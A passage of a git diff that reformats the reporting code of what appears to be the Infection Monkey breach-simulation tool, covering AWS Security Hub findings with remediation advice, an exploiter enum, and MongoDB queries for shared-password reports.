- e
- )
+ "AWS exporter called but AWS-CLI security hub service is not installed. "
+ "Error: {}".format(e)
)
return False
except Exception as e:
@@ -123,20 +123,20 @@ class AWSExporter(Exporter):
@staticmethod
def _get_finding_resource(instance_id, instance_arn):
if instance_id:
- return [{"Type": "AwsEc2Instance", "Id": instance_arn.format(instance_id=instance_id)}]
+ return [{"Type":"AwsEc2Instance", "Id":instance_arn.format(instance_id=instance_id)}]
else:
- return [{"Type": "Other", "Id": "None"}]
+ return [{"Type":"Other", "Id":"None"}]
@staticmethod
def _build_generic_finding(
- severity, title, description, recommendation, instance_arn, instance_id=None
+ severity, title, description, recommendation, instance_arn, instance_id=None
):
finding = {
- "Severity": {"Product": severity, "Normalized": 100},
- "Resources": AWSExporter._get_finding_resource(instance_id, instance_arn),
- "Title": title,
- "Description": description,
- "Remediation": {"Recommendation": {"Text": recommendation}},
+ "Severity":{"Product":severity, "Normalized":100},
+ "Resources":AWSExporter._get_finding_resource(instance_id, instance_arn),
+ "Title":title,
+ "Description":description,
+ "Remediation":{"Recommendation":{"Text":recommendation}},
}
return finding
@@ -145,276 +145,322 @@ class AWSExporter(Exporter):
def _handle_tunnel_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=5,
- title="Weak segmentation - Machines were able to communicate over unused ports.",
- description="Use micro-segmentation policies to disable communication other than the required.",
- recommendation="Machines are not locked down at port level. "
- "Network tunnel was set up from {0} to {1}".format(issue["machine"], issue["dest"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=5,
+ title="Weak segmentation - Machines were able to communicate over unused ports.",
+ description="Use micro-segmentation policies to disable communication other than "
+ "the required.",
+ recommendation="Machines are not locked down at port level. "
+ "Network tunnel was set up from {0} to {1}".format(issue["machine"],
+ issue["dest"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_sambacry_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Samba servers are vulnerable to 'SambaCry'",
- description="Change {0} password to a complex one-use password that is not shared with other computers on the "
- "network. Update your Samba server to 4.4.14 and up, "
- "4.5.10 and up, or 4.6.4 and up.".format(issue["username"]),
- recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB "
- "protocol with user {2} and its password, and used the SambaCry "
- "vulnerability.".format(issue["machine"], issue["ip_address"], issue["username"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Samba servers are vulnerable to 'SambaCry'",
+ description="Change {0} password to a complex one-use password that is not shared "
+ "with other computers on the "
+ "network. Update your Samba server to 4.4.14 and up, "
+ "4.5.10 and up, or 4.6.4 and up.".format(issue["username"]),
+ recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The "
+ "Monkey authenticated over the SMB "
+ "protocol with user {2} and its password, and used the SambaCry "
+ "vulnerability.".format(issue["machine"], issue["ip_address"],
+ issue["username"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_smb_pth_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=5,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over "
- "SMB protocol with user {2}.".format(
- issue["machine"], issue["ip_address"], issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=5,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey "
+ "used a pass-the-hash attack over "
+ "SMB protocol with user {2}.".format(
+ issue["machine"], issue["ip_address"], issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_ssh_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH"
- " protocol with user {2} and its "
- "password.".format(issue["machine"], issue["ip_address"], issue["username"]),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using SSH passwords supplied by the user during "
+ "the Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey "
+ "authenticated over the SSH"
+ " protocol with user {2} and its "
+ "password.".format(issue["machine"], issue["ip_address"],
+ issue["username"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_ssh_key_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
- description="Protect {ssh_key} private key with a pass phrase.".format(
- ssh_key=issue["ssh_key"]
- ),
- recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated "
- "over the SSH protocol with private key {ssh_key}.".format(
- machine=issue["machine"], ip_address=issue["ip_address"], ssh_key=issue["ssh_key"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using SSH passwords supplied by the user during "
+ "the Monkey's configuration.",
+ description="Protect {ssh_key} private key with a pass phrase.".format(
+ ssh_key=issue["ssh_key"]
+ ),
+ recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH "
+ "attack. The Monkey authenticated "
+ "over the SSH protocol with private key {ssh_key}.".format(
+ machine=issue["machine"], ip_address=issue["ip_address"],
+ ssh_key=issue["ssh_key"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_elastic_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Elastic Search servers are vulnerable to CVE-2015-1427",
- description="Update your Elastic Search server to version 1.4.3 and up.",
- recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made "
- "possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
- issue["machine"], issue["ip_address"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Elastic Search servers are vulnerable to CVE-2015-1427",
+ description="Update your Elastic Search server to version 1.4.3 and up.",
+ recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. "
+ "The attack was made "
+ "possible because the Elastic Search server was not patched "
+ "against CVE-2015-1427.".format(issue["machine"],
+ issue["ip_address"]),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_island_cross_segment_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Weak segmentation - Machines from different segments are able to communicate.",
- description="Segment your network and make sure there is no communication between machines from different "
- "segments.",
- recommendation="The network can probably be segmented. A monkey instance on \
+ severity=1,
+ title="Weak segmentation - Machines from different segments are able to "
+ "communicate.",
+ description="Segment your network and make sure there is no communication between "
+ "machines from different "
+ "segments.",
+ recommendation="The network can probably be segmented. A monkey instance on \
{0} in the networks {1} \
could directly access the Monkey Island server in the networks {2}.".format(
- issue["machine"], issue["networks"], issue["server_networks"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ issue["machine"], issue["networks"], issue["server_networks"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shared_passwords_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Multiple users have the same password",
- description="Some users are sharing passwords, this should be fixed by changing passwords.",
- recommendation="These users are sharing access password: {0}.".format(
- issue["shared_with"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Multiple users have the same password",
+ description="Some users are sharing passwords, this should be fixed by changing "
+ "passwords.",
+ recommendation="These users are sharing access password: {0}.".format(
+ issue["shared_with"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shellshock_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Machines are vulnerable to 'Shellshock'",
- description="Update your Bash to a ShellShock-patched version.",
- recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
- "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a "
- "shell injection attack on the paths: {3}.".format(
- issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Machines are vulnerable to 'Shellshock'",
+ description="Update your Bash to a ShellShock-patched version.",
+ recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
+ "The attack was made possible because the HTTP server running on "
+ "TCP port {2} was vulnerable to a "
+ "shell injection attack on the paths: {3}.".format(
+ issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_smb_password_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB "
- "protocol with user {2} and its password.".format(
- issue["machine"], issue["ip_address"], issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey "
+ "authenticated over the SMB "
+ "protocol with user {2} and its password.".format(
+ issue["machine"], issue["ip_address"], issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_wmi_password_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.",
- recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over "
- "the WMI protocol with user {username} and its password.".format(
- machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.",
+ recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI "
+ "attack. The Monkey authenticated over "
+ "the WMI protocol with user {username} and its password.".format(
+ machine=issue["machine"], ip_address=issue["ip_address"],
+ username=issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_wmi_pth_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
- description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
- "network.".format(issue["username"]),
- recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey used a "
- "pass-the-hash attack over WMI protocol with user {username}".format(
- machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Machines are accessible using passwords supplied by the user during the "
+ "Monkey's configuration.",
+ description="Change {0}'s password to a complex one-use password that is not "
+ "shared with other computers on the "
+ "network.".format(issue["username"]),
+ recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI "
+ "attack. The Monkey used a "
+ "pass-the-hash attack over WMI protocol with user {username}".format(
+ machine=issue["machine"], ip_address=issue["ip_address"],
+ username=issue["username"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shared_passwords_domain_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Multiple users have the same password.",
- description="Some domain users are sharing passwords, this should be fixed by changing passwords.",
- recommendation="These users are sharing access password: {shared_with}.".format(
- shared_with=issue["shared_with"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Multiple users have the same password.",
+ description="Some domain users are sharing passwords, this should be fixed by "
+ "changing passwords.",
+ recommendation="These users are sharing access password: {shared_with}.".format(
+ shared_with=issue["shared_with"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shared_admins_domain_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Shared local administrator account - Different machines have the same account as a local administrator.",
- description="Make sure the right administrator accounts are managing the right machines, and that there isn't "
- "an unintentional local admin sharing.",
- recommendation="Here is a list of machines which the account {username} is defined as an administrator: "
- "{shared_machines}".format(
- username=issue["username"], shared_machines=issue["shared_machines"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Shared local administrator account - Different machines have the same "
+ "account as a local administrator.",
+ description="Make sure the right administrator accounts are managing the right "
+ "machines, and that there isn't "
+ "an unintentional local admin sharing.",
+ recommendation="Here is a list of machines which the account {username} is "
+ "defined as an administrator: "
+ "{shared_machines}".format(
+ username=issue["username"], shared_machines=issue["shared_machines"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_strong_users_on_crit_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=1,
- title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
- description="This critical machine is open to attacks via strong users with access to it.",
- recommendation="The services: {services} have been found on the machine thus classifying it as a critical "
- "machine. These users has access to it:{threatening_users}.".format(
- services=issue["services"], threatening_users=issue["threatening_users"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=1,
+ title="Mimikatz found login credentials of a user who has admin access to a "
+ "server defined as critical.",
+ description="This critical machine is open to attacks via strong users with "
+ "access to it.",
+ recommendation="The services: {services} have been found on the machine thus "
+ "classifying it as a critical "
+ "machine. These users has access to it:{threatening_users}.".format(
+ services=issue["services"], threatening_users=issue["threatening_users"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_struts2_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Struts2 servers are vulnerable to remote code execution.",
- description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
- recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
- "The attack was made possible because the server is using an old version of Jakarta based file "
- "upload Multipart parser.".format(
- machine=issue["machine"], ip_address=issue["ip_address"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Struts2 servers are vulnerable to remote code execution.",
+ description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
+ recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to "
+ "remote code execution attack."
+ "The attack was made possible because the server is using an old "
+ "version of Jakarta based file "
+ "upload Multipart parser.".format(
+ machine=issue["machine"], ip_address=issue["ip_address"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_weblogic_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Oracle WebLogic servers are vulnerable to remote code execution.",
- description="Install Oracle critical patch updates. Or update to the latest version. "
- "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
- recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
- "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware "
- "(subcomponent: WLS Security).".format(
- machine=issue["machine"], ip_address=issue["ip_address"]
- ),
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Oracle WebLogic servers are vulnerable to remote code execution.",
+ description="Install Oracle critical patch updates. Or update to the latest "
+ "version. "
+ "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and "
+ "12.2.1.2.0.",
+ recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable "
+            "to remote code execution attack. "
+ "The attack was made possible due to incorrect permission "
+ "assignment in Oracle Fusion Middleware "
+ "(subcomponent: WLS Security).".format(
+ machine=issue["machine"], ip_address=issue["ip_address"]
+ ),
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_hadoop_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
- severity=10,
- title="Hadoop/Yarn servers are vulnerable to remote code execution.",
- description="Run Hadoop in secure mode, add Kerberos authentication.",
- recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
- "The attack was made possible due to default Hadoop/Yarn configuration being insecure.",
- instance_arn=instance_arn,
- instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
+ severity=10,
+ title="Hadoop/Yarn servers are vulnerable to remote code execution.",
+ description="Run Hadoop in secure mode, add Kerberos authentication.",
+ recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to "
+            "remote code execution attack. "
+ "The attack was made possible due to default Hadoop/Yarn "
+ "configuration being insecure.",
+ instance_arn=instance_arn,
+ instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py
index c19f3d5e3..f984762ae 100644
--- a/monkey/monkey_island/cc/services/reporting/exporter_init.py
+++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py
@@ -13,9 +13,9 @@ def populate_exporter_list():
if len(manager.get_exporters_list()) != 0:
logger.debug(
- "Populated exporters list with the following exporters: {0}".format(
- str(manager.get_exporters_list())
- )
+ "Populated exporters list with the following exporters: {0}".format(
+ str(manager.get_exporters_list())
+ )
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index e60886b34..988beeec3 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -2,16 +2,20 @@ from dataclasses import dataclass
from enum import Enum
from typing import Type
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors\
+ .cred_exploit import (
CredExploitProcessor,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploitProcessor,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors\
+ .shellshock_exploit import (
ShellShockExploitProcessor,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon\
+ import (
ZerologonExploitProcessor,
)
@@ -30,24 +34,24 @@ class ExploiterDescriptorEnum(Enum):
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
SAMBACRY = ExploiterDescriptor("SambaCryExploiter", "SambaCry Exploiter", CredExploitProcessor)
ELASTIC = ExploiterDescriptor(
- "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
+ "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
)
MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
SHELLSHOCK = ExploiterDescriptor(
- "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
+ "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
)
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
WEBLOGIC = ExploiterDescriptor(
- "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
+ "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
)
HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor)
MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor)
VSFTPD = ExploiterDescriptor(
- "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor
+ "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor
)
DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor)
ZEROLOGON = ExploiterDescriptor(
- "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor
+ "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor
)
@staticmethod
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py
index 842fe9eb2..5a85a8a7b 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py
@@ -1,8 +1,10 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing\
+ .exploiter_report_info import (
CredentialType,
ExploiterReportInfo,
)
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploitProcessor,
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py
index 1b29fc773..9ced6d3ea 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py
@@ -1,5 +1,6 @@
from monkey_island.cc.services.node import NodeService
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing\
+ .exploiter_report_info import (
ExploiterReportInfo,
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
index cd627eb5c..cf2859fb4 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
@@ -1,4 +1,5 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploiterReportInfo,
ExploitProcessor,
)
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py
index d9c9d7d49..e3b370bf4 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py
@@ -1,4 +1,5 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import (
+from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit \
+ import (
ExploiterReportInfo,
ExploitProcessor,
)
diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py
index 99c5a7467..ab18ffd21 100644
--- a/monkey/monkey_island/cc/services/reporting/pth_report.py
+++ b/monkey/monkey_island/cc/services/reporting/pth_report.py
@@ -19,7 +19,8 @@ class PTHReportService(object):
@staticmethod
def __dup_passwords_mongoquery():
"""
- This function builds and queries the mongoDB for users that are using the same passwords. this is done
+ This function builds and queries the mongoDB for users that are using the same
+ passwords. this is done
by comparing the NTLM hash found for each user by mimikatz.
:return:
A list of mongo documents (dicts in python) that look like this:
@@ -31,59 +32,62 @@ class PTHReportService(object):
"""
pipeline = [
- {"$match": {"NTLM_secret": {"$exists": "true", "$ne": None}}},
+ {"$match":{"NTLM_secret":{"$exists":"true", "$ne":None}}},
{
- "$group": {
- "_id": {"NTLM_secret": "$NTLM_secret"},
- "count": {"$sum": 1},
- "Docs": {
- "$push": {
- "_id": "$_id",
- "name": "$name",
- "domain_name": "$domain_name",
- "machine_id": "$machine_id",
+ "$group":{
+ "_id":{"NTLM_secret":"$NTLM_secret"},
+ "count":{"$sum":1},
+ "Docs":{
+ "$push":{
+ "_id":"$_id",
+ "name":"$name",
+ "domain_name":"$domain_name",
+ "machine_id":"$machine_id",
}
},
}
},
- {"$match": {"count": {"$gt": 1}}},
+ {"$match":{"count":{"$gt":1}}},
]
return mongo.db.groupsandusers.aggregate(pipeline)
@staticmethod
def __get_admin_on_machines_format(admin_on_machines, domain_name):
"""
- This function finds for each admin user, which machines its an admin of, and compile them to a list.
+ This function finds for each admin user, which machines its an admin of, and compile them
+ to a list.
:param admin_on_machines: A list of "monkey" documents "_id"s
:param domain_name: The admins' domain name
:return:
A list of formatted machines names *domain*/*hostname*, to use in shared admins issues.
"""
- machines = mongo.db.monkey.find({"_id": {"$in": admin_on_machines}}, {"hostname": 1})
+ machines = mongo.db.monkey.find({"_id":{"$in":admin_on_machines}}, {"hostname":1})
return [domain_name + "\\" + i["hostname"] for i in list(machines)]
@staticmethod
def __strong_users_on_crit_query():
"""
- This function build and query the mongoDB for users that mimikatz was able to find cached NTLM hashes and
- are administrators on machines with services predefined as important services thus making these machines
+ This function build and query the mongoDB for users that mimikatz was able to find
+ cached NTLM hashes and
+ are administrators on machines with services predefined as important services thus
+ making these machines
critical.
:return:
A list of said users
"""
pipeline = [
- {"$unwind": "$admin_on_machines"},
- {"$match": {"type": USERTYPE, "domain_name": {"$ne": None}}},
+ {"$unwind":"$admin_on_machines"},
+ {"$match":{"type":USERTYPE, "domain_name":{"$ne":None}}},
{
- "$lookup": {
- "from": "monkey",
- "localField": "admin_on_machines",
- "foreignField": "_id",
- "as": "critical_machine",
+ "$lookup":{
+ "from":"monkey",
+ "localField":"admin_on_machines",
+ "foreignField":"_id",
+ "as":"critical_machine",
}
},
- {"$match": {"critical_machine.critical_services": {"$ne": []}}},
- {"$unwind": "$critical_machine"},
+ {"$match":{"critical_machine.critical_services":{"$ne":[]}}},
+ {"$unwind":"$critical_machine"},
]
return mongo.db.groupsandusers.aggregate(pipeline)
@@ -102,15 +106,15 @@ class PTHReportService(object):
for doc in docs:
users_list = [
{
- "username": user["name"],
- "domain_name": user["domain_name"],
- "hostname": NodeService.get_hostname_by_id(ObjectId(user["machine_id"]))
+ "username":user["name"],
+ "domain_name":user["domain_name"],
+ "hostname":NodeService.get_hostname_by_id(ObjectId(user["machine_id"]))
if user["machine_id"]
else None,
}
for user in doc["Docs"]
]
- users_cred_groups.append({"cred_groups": users_list})
+ users_cred_groups.append({"cred_groups":users_list})
return users_cred_groups
@@ -121,18 +125,18 @@ class PTHReportService(object):
for group in user_groups:
user_info = group["cred_groups"][0]
issues.append(
- {
- "type": "shared_passwords_domain"
- if user_info["domain_name"]
- else "shared_passwords",
- "machine": user_info["hostname"]
- if user_info["hostname"]
- else user_info["domain_name"],
- "shared_with": [
- PTHReportService.__build_dup_user_label(i) for i in group["cred_groups"]
- ],
- "is_local": False if user_info["domain_name"] else True,
- }
+ {
